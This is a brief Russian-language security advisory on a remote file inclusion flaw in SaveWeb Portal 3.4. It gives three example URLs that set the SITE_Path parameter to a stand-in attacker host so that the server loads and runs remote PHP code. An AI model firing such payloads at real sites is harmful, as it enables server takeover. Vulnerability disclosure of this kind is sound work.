Программа: SaveWeb Portal 3.4

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.

Пример:

http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts? http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?



Оставить мнение